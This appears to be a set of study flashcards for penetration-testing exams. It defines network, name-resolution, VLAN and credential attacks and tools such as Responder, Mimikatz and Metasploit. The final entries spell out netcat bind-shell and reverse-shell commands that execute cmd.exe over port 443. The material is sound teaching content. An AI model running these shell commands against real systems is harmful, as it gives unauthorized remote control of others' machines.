Stress Testing
A software testing method that evaluates how software performs under extreme load
Packet Storm/Network Storm
Any large increase in network traffic directed at a target. This typically involves random characters or data flooding the target.
Character Generator Protocol
A protocol used for testing, debugging, and measuring networks; operates over TCP or UDP on port 19. Can be used to perform a packet/network storm.
Exploit Database (DB)
A complete collection of public exploits, vulnerable software, Shellcode, and Security Papers. Kept in a fully searchable database.
exploit-db.com
Packet Storm (Exploit Resource Website)
A web resource that contains news articles, advisories, whitepapers, tools, and exploits that can be reviewed and used in pen tests
Exploit Chaining
The act of using multiple exploits to form a larger attack (sequentially or in parallel)
Address Resolution Protocol (ARP)
A TCP/IP protocol used automatically on a LAN to determine the MAC address that corresponds to a particular IP address.
ARP Cache
A table containing local MAC addresses and their corresponding IP addresses.
ARP Spoofing
Sending falsified ARP packets over a LAN to link an attacker's MAC address with an IP of a legitimate computer already on the LAN.
ARP Poisoning
After successful ARP spoofing, the attacker has altered the organization's ARP tables so that they contain falsified MAC-to-IP mappings.
Arpspoof
A tool that can be used to conduct ARP spoofing against a target machine's IP address.
DNS Poisoning
An attack that substitutes DNS addresses in the DNS cache on DNS servers, routers, etc. so that the computer is automatically redirected to an attacker's device.
DNS Security Extensions (DNSSEC)
Uses digital signatures based on public key cryptography to ensure DNS data is digitally signed by the zone owner. Helps to protect against DNS spoofing/poisoning.
DNS Zone Transfer
A method of replicating DNS database entries across a set of DNS servers
DNS Harvesting
A form of OSINT used to gather information about a domain name and its associated resources
Link-Local Multicast Name Resolution (LLMNR)
A protocol based on the formatting of DNS packets that serves the same function as a DNS server when a DNS server cannot be reached. It resolves the names of devices connected to a local network and only works when the devices are on the same LAN. Only works for Windows systems.
NetBIOS Name Service (NBNS or NBT-NS)
A service that is part of the NetBIOS over TCP protocol suite that is used as a type of name resolution inside the local network to translate internal hostnames to IP addresses
___ example: //FileServer or //ShareDrive
Responder Tool
A command line tool in Kali Linux that is used to poison NetBIOS, LLMNR, and mDNS name resolution protocol requests
MAC Spoofing
A technique for changing the factory-assigned MAC address of a network interface on a networked device.
macchanger
A Kali command-line tool for spoofing your MAC address.
Virtual Local Area Network (VLAN)
A virtualized connection that connects multiple devices and network nodes sharing a physical LAN, isolating the traffic for each group.
VLAN Hopping
An attack technique that exploits a misconfiguration to gain access to traffic on other VLANs without the proper authorization
Double Tagging
A VLAN hopping attack method where an attacker tries to reach another VLAN by using weaknesses in the trunk port configuration.
Switch spoofing
A VLAN hopping attack method where an attacker attempts to conduct a Dynamic Trunking Protocol (DTP) negotiation with the switch.
MAC address flooding attack (CAM table flooding attack)
A VLAN hopping attack in which the attacker overloads the network switch's MAC (CAM) table, putting the switch into fail-open mode so it starts behaving like a network hub (broadcasting traffic to all VLANs).
Network Access Control (NAC)
Security technology in which devices are scanned to determine their current state prior to being allowed onto a private network (keeps unauthorized users or devices from accessing it). Might check MAC addresses, antivirus status, OS version, etc.
Persistent Agent (NAC software)
A piece of network access control software installed on a device requesting access to the network. (no access without agent)
Non-Persistent Agent (NAC software)
A network access control solution that requires users to connect to/log into a captive portal (web page) and download a ____ NAC agent that scans their device for compliance. The software then removes itself after the scan.
Agentless NAC/Volatile Agent
Installs the NAC scanning engine on the domain controller instead of the endpoint device.
On-Path Attack (formerly Man-in-the-middle)
An attack where the attacker puts themselves between the victim and the intended destination
Replay Attack
A replay attack occurs when a cybercriminal eavesdrops on a secure network communication (e.g. an authentication message), intercepts it, and then fraudulently delays or 'replays' it to misdirect the receiver into doing what the hacker wants.
Relay attack
in a ____ attack, an attacker intercepts communication between two parties and then, without viewing or manipulating it, relays it to another device. For example, a thief could capture the radio signal from your vehicle's key fob and relay it to an accomplice who could use it to open your car door.
NTLM relay attacks
____ relay attacks allow attackers to sit between clients and servers and relay validated authentication requests in order to access network services.
In a ____ relay attack, an attacker establishes a position between the client and server on the network and intercepts authentication traffic. Client authentication requests are forwarded to the server by the attacker, similarly challenges are relayed to the client and valid authentication responses to the challenge from the client are sent back to the server, allowing the attacker—rather than the client—to authenticate using the client's credentials.
SSL Stripping
An attack that focuses on stripping the security from HTTPS-enabled websites (present user with HTTP connection)
Password Crackers
Software that can guess/break a user's password using dictionary or brute-force techniques. Tools include John the Ripper and Cain and Abel.
Dictionary Password Attack
A password attack that uses a list of common passwords, words, phrases, etc. to guess the password.
brute force password attack
An attempt to guess a password by trying every possible combination of characters and numbers in it.
Rainbow Table
Table of precomputed hash values that contain known passwords used for offline password cracking
Password Spraying
A password attack/brute force method in which multiple user accounts are tested with a dictionary of common passwords (checking multiple accounts hoping someone might have lax security)
Credential Stuffing
Testing stolen user account names and passwords against multiple websites (relies on users reusing the same password on multiple sites).
Pass the Hash Attacks
A network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated from. NTLM relay attacks are an example of this type of attack.
Mimikatz
An open-source application that allows users to view and save authentication credentials such as Kerberos tickets by scanning LSASS memory. An attacker can then perform pass-the-hash attacks.
Kerberoasting
Technique that allows any domain user account to request a service-granting ticket for a service principal name from the ticket granting service.
Golden Ticket
A master ticket that comes from the Kerberos ticket-granting-ticket, which can be used for any Kerberos service. Very desirable for attackers.
Silver Ticket
A ticket granting service ticket that is only good for certain Kerberos-specific services
Metasploit
____ is an open-source pen testing framework that is a tool for developing and executing exploit code against a remote target machine and aids in penetration testing and IDS signature development. Developed by Rapid7. Launched by the msfconsole command. Exploit and payload library for launching attacks.
Netcat (nc)
Command-line utility for reading from and writing raw data to network connections (used for establishing shells).
Bind shell
A type of shell connection where the attacker opens a listening port on the victim's machine that the attacker then connects to. Less effective today due to increased security from firewalls.
Reverse Shell
A type of shell connection where the attacker runs a listener on their own workstation, configures a listening port, and manipulates the target machine into connecting back to it (no abnormal open ports on the target machine).
nc -l -p 443 -e cmd.exe
This is the netcat command to listen on port 443 and execute the Windows command terminal (cmd.exe). This would be an example of a bind shell, since port 443 is being opened on the target machine.
nc -l -p 443
Tells netcat to listen on port 443 on your attacking machine (the first half of establishing a reverse shell).
nc [ip address] 443 -e cmd.exe
The netcat command run on the remote system to connect to your attacking machine on port 443 and execute cmd.exe. This is the second half of establishing a reverse shell, as you would already need to be listening on port 443 on your attacking machine.